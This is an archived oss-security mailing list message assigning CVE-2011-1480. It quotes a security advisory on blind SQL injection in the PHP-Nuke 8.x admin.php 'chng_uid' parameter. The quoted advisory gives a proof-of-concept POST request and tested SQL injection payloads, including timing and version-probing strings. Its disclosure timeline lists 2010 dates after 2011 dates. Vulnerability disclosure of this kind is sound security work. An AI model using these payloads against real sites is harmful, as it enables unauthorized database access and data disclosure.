[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] CVE Request: PHP-Nuke 8.x <= "chng_uid" Blind
From: Josh Bressers <bressers () redhat ! com>
Date: 2011-03-30 19:37:02
Message-ID: 1631157357.286087.1301513822965.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
[Download RAW message or body]
Please use CVE-2011-1480.
Thanks.
--
JB
----- Original Message -----
> PHP-Nuke 8.x <= Blind SQL Injection Vulnerability
>
>
>
> 1. OVERVIEW
>
> The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL
> Injection.
>
>
> 2. BACKGROUND
>
> PHP-Nuke is a Web Portal System or content management system. The goal
> of PHP-Nuke is to have an automated web site to distribute news and
> articles with users system. Each user can submit comments to discuss
> the articles. Main features include: web based admin, surveys, top
> page, access stats page with counter, user customizable box, themes
> manager for registered users, friendly administration GUI with graphic
> topic manager, option to edit or delete stories, option to delete
> comments, moderation system, Referrers page to know who link us,
> sections manager, customizable HTML blocks, user and authors edit, an
> integrated Banners Ads system, search engine, backend/headlines
> generation (RSS/RDF format), and many, many more friendly functions.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> The "chng_uid" parameter is not properly sanitized upon submission to
> the /admin.php which leads to Blind SQL Injection vulnerability.
> This allows an attacker to inject or manipulate SQL queries in the
> back-end database, allowing for the manipulation or disclosure of
> arbitrary data.
>
>
> 4. VERSIONS AFFECTED
>
> 8.0 and lower
>
> Tested version: 8.0
> The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> => /admin.php
>
> POST /admin.php HTTP/1.1
> Referer: http://localhost/admin.php?op=mod_users
> Content-Type: application/x-www-form-urlencoded
> Host: localhost
>
> chng_uid=[BLIND_SQL_INJECTION]+&op=modifyUser
>
>
> Tested Payloads:
> ' or 1=1-- [TRUE]
> ' or 1=2-- [FALSE]
> ' or substring(@@version,1,1)=5-- [TRUE if mySQL version is 5.x]
> ' or substring(@@version,1,1)=4-- [FALSE if mySQL version is 5.x]
> ' or SLEEP(15)=0-- [sleep for 15 seconds]
>
> Successful response (True) returns the user update form page.
>
>
> 6. SOLUTION
>
> Lock down access to php-Nuke administration backend.
> No patch is available yet.
> Use of this product is NOT recommended because of long lack of update
> and vendor negligence about security reports.
>
>
> 7. VENDOR
>
> php-Nuke Developers
> http://phpnuke.org/
>
>
> 8. CREDIT
>
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2011-01-01: contacted author through emails
> 2011-01-25: contacted author through web site contact form
> 2010-03-23: no replies from author
> 2010-03-23: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection
> About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
> PHP-Nuke 8.0:
> http://phpnuke.org/modules.php?name=Downloads&d_op=getit&lid=658
> CWE-89: http://cwe.mitre.org/data/definitions/89.html
>
>
>
> #yehg [2010-03-23]
>
> keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql
> injection
>
> ---------------------------------
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic